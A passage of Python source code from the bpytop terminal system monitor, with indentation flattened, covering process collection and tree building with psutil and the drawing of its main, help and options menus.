stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
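#* Pre-compiled expressions evaluated as sort keys for each process in _collect() and _tree()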
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if Box.stat_mode: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: str = cls.search_filter
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
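#* Apply the comma separated search filter against name, cmdline, pid and username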
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
for s in search.split(","):
if s.strip() in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd,
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
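#* Gather extra info for the process shown in the detailed view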
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
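# Purely cosmetic scaling (assumed visual tuning, not a unit conversion): boost low
# memory percentages so the small detail graph still shows visible movement.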
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
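# The tree is a defaultdict mapping each parent pid to its child pids. create_tree()
# walks it recursively, building the box-drawing indent strings, and when a branch is
# collapsed it folds the children's thread, memory and cpu totals into the collapsed
# parent via 'collapse_to' instead of emitting separate rows.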
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = True if depth > CONFIG.tree_depth else False
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd,
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
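# Pre-render every menu entry in both "normal" and "selected" state as ready-to-print
# ANSI strings (one color per banner line, with cursor moves between lines), so the
# drawing loops only have to pick the matching string each frame.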
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if mx >= pos["x1"] and mx <= pos["x2"] and my >= pos["y1"] and my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = True if cls.active else False
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Change current view mode, order full->proc->stat.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if mx >= x and mx < x + w and my >= y and my < y + h + 3:
if pages and my == y and mx > x + 56 and mx < x + 61:
key = "up"
elif pages and my == y and mx > x + 63 and mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(1)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = True if cls.active else False
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
global ARG_MODE
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
option_items: Dict[str, List[str]] = {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"view_mode" : [
'Set bpytop view mode.',
'',
'"full" for everything shown.',
'"proc" for cpu stats and processes.',
'"stat" for cpu, mem, disks and net stats shown.'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'
],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Examples:',
'"%X" locale HH:MM:SS',
'"%H" 24h hour, "%I" 12h hour',
'"%M" minute, "%S" second',
'"%d" day, "%m" month, "%y" year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus are flickering',
'too much for a comfortable experience.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be last folder in path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma.',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Otherwise defaults to an "include" filter.',
'',
'Example: disks_filter="exclude=boot, home"'],
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10 KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetic and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
}
option_len: int = len(option_items) * 2
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode)
color_i: int
while not cls.close:
key = ""
if cls.resized:
y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = Term.height-2-y, 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = 1
selected_int = 0
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "view_mode":
counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if mx > x and mx < x + w and my > y and my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and mx > x+11 and mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and mx > x+19 and mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
